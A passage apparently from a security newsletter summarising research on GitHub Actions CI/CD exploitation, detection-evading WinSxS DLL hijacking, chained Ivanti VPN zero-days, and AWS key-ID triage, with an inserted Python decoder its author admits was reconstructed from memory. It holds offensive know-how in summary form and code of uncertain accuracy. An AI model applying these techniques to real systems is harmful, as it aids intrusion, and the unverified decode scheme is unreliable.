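    for f in find_macro_links(build_sample_odt()):
        print(f)
```

A hit with "automatic": True is the one to act on first; a clickable macro link still needs the user, an event-bound one does not.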
Worse than SolarWinds: Three Steps to Hack Blockchains, GitHub, and ML through GitHub Actions
John Stawinski details both the attack surface and how they made a lot of money from it..
Over the last four months, we have been going through this list of vulnerable repositories, performing advanced CI/CD exploitation, and submitting our results through the respective bug bounty programs. So far, we’ve submitted over 20 bug bounty reports, raking in hundreds of thousands of dollars in bounties.
Offense
Attack capability, techniques and trade-craft.
Hide and Seek in Windows' Closet: Unmasking the WinSxS Hijacking Hideout
Of note to defensive teams due to the lowering of detection probability.
Our research team has evolved the classic DLL Search Order Hijacking technique by deliberately targeting files located in the WinSxS folder. Our approach lowers the probability of detection compared to the classic DLL Search Order Hijacking, as the malicious code operates within the memory space of a trusted binary located in the Windows folder WinSxS. Unlike traditional methods, there is no requirement to introduce your own vulnerable binary, as Windows already includes various files stored in the WinSxS directory that can be leveraged.
Changing Primary Tokens Session ID
Jonathan Johnson details how this works so we can look for the signals it might be happening.
Microsoft documentation mentions that a developer may change the session id within a token. Although that is true, it isn’t valuable unless the session id equals the session id held within the process object. So although this malware seemed to be doing something cool, it wouldn’t have worked properly unless they were changing their token session id to equal the process’s session id, which would require:
Suspension of all the threads within that process
Some way of getting thread execution within that process via injection or something similar
https://jsecurity101.medium.com/changing-primary-tokens-session-id-931c269aa08e
Exploitation
What is being exploited.
Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
Matthew Meltzer, Robert Jan Mora, Sean Koessel, Steven Adair and Thomas Lancaster detail this active exploitation, which they allege is by the Chinese state.
[We] discovered two different zero-day exploits which were being chained together to achieve unauthenticated remote code execution (RCE). Through forensic analysis of the memory sample, Volexity was able to recreate two proof-of-concept exploits that allowed full unauthenticated command execution on the ICS VPN appliance. These two vulnerabilities have been assigned the following CVEs:
CVE-2023-46805 - an authentication-bypass vulnerability with a CVSS score of 8.2
CVE-2024-21887 - a command-injection vulnerability found in multiple web components with a CVSS score of 9.1
When combined, these two vulnerabilities make it trivial for attackers to run commands on the system.
[We have] reason to believe that UTA0178 is a Chinese nation-state-level threat actor.
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
A short note on AWS KEY ID
Tal Be'ery educates us that AWS encodes the account number inside access key IDs, which will be useful in instances where keys leak and you are trying to work out the impact.
https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489
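To make the triage step usable from a leak, here is an added example of mine (not Tal's code) that recovers the account number from an access key ID, plus a synthetic encoder so it can be demonstrated without a real key. The decode (base32 of the ID after the four-character prefix, then a 40-bit field masked out of the first six bytes) is reproduced from my memory of the linked note rather than from this page, so verify it against the note before relying on it; the account numbers used are made up.

```python
"""
Added example (my own): recover the AWS account ID from an access key ID.
The base32/mask scheme is an assumption reproduced from memory of the
linked note; the account numbers are made up.
"""
import base64
import os

ACCOUNT_MASK = 0x7FFFFFFFFF80  # assumed: 40-bit account field inside the first 6 bytes


def account_id_from_key_id(key_id: str) -> int:
    """AKIA.../ASIA... -> 12-digit account number encoded in the key."""
    body = key_id[4:]                     # drop the AKIA/ASIA prefix
    raw = base64.b32decode(body)          # 16 base32 chars -> 10 bytes
    z = int.from_bytes(raw[:6], "big")
    return (z & ACCOUNT_MASK) >> 7


def make_key_id(account_id: int, prefix: str = "AKIA", tail: bytes = None) -> str:
    """Synthetic key ID for the demo: the inverse of the decode above."""
    if not 0 <= account_id < 2 ** 40:
        raise ValueError("account id must fit in 40 bits")
    head = (account_id << 7).to_bytes(6, "big")
    tail = tail if tail is not None else os.urandom(4)  # remaining 4 bytes are not the account
    return prefix + base64.b32encode(head + tail).decode()


def triage(leaked_keys):
    """Map each leaked key ID to its account so you know whose estate is exposed."""
    return {k: f"{account_id_from_key_id(k):012d}" for k in leaked_keys}


if __name__ == "__main__":
    # Made-up account numbers
    sample = [make_key_id(123456789012), make_key_id(210987654321, prefix="ASIA")]
    print(triage(sample))
```

The practical use is that a key found in a public repo tells you which account to go and rotate in before you have even checked whether it is still live.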
YaraDbg
Wonderful release here also much love to #100DaysOfYara on X (formerly Twitter)
YaraDbg is a free web-based Yara debugger to help security analysts to write hunting or detection rules with less effort and more confidence. By using YaraDbg, you can perform a thorough root-cause-analysis (RCA) on why some of your Yara rules did or did not match with a specific file. It can also help you to better maintain a large set of yara rules.
https://github.com/DissectMalware/yaradbg-frontend
https://github.com/DissectMalware/yaradbg-backend
https://github.com/DissectMalware/yaradbg-backend/blob/main/yaraparser/ydbg/yara.grammar
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
2023 CVE Data Review - We ended 2023 with 28,902 published CVEs, up over 15% from the 25,081 CVEs published in 2022.
Digitally encoded RF to optical data transfer using excited Rb without the use of a local oscillator - We present a passive RF to optical data transfer without a local oscillator using an atomic “Rydberg” receiver. We demonstrate the ability to detect a 5G frequency carrier wave (3.5 GHz) and decode digital data from the carrier wave without the use of a local oscillator to detect the modulation of the RF signal.
Researchers Create First Functional Semiconductor Made From Graphene - Known as the "band gap", it is a crucial electronic property that allows semiconductors to switch on and off. Graphene didn't have a band gap – until now.
Cybersecurity and the politics of knowledge production: towards a reflexive practice - We examine the politics of ‘the making of’ cybersecurity expertise as knowledge practitioners who are located across and in between the diverse and overlapping fields of academia, diplomacy and policy. Cybersecurity expertise, and the practices of the cybersecurity epistemic community more broadly, rely heavily on the perceived applicability and actionability of knowledge outputs, on the practical dependency on policy practitioners regarding access, and thus on the continuous negotiation of hierarchies of knowledge.
Artificial intelligence
Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models
Mind2Web: Towards a Generalist Agent for the Web - this looks super powerful for web security use cases
Blending Is All You Need: Cheaper, Better Alternative to Trillion-Parameters LLM
Reality warping / disinformation enabling…
Books
The Crypto Launderers: Crime and Cryptocurrencies from the Dark Web to DeFi and Beyond
Trafficking Data: How China Is Winning the Battle for Digital Sovereignty
Cyber Sovereignty: The Future of Governance in Cyberspace - out in June 2024
Adventures in Volcanoland: What Volcanoes Tell Us About the World and Ourselves by fellow Police Science Advisory Council member Tamsin Mather - who knew planets without tectonic plates can have volcanoes
Events
Video this week is from our colleagues at NSA at the Post-Quantum: Cybersecurity Speaker Series
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how we will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.
I think Beaumont missed the bigger issue of ROV RPKI and the role it played in the Orange Spain event. I like Madory's review on it a bit more: https://www.kentik.com/blog/digging-into-the-orange-espana-hack/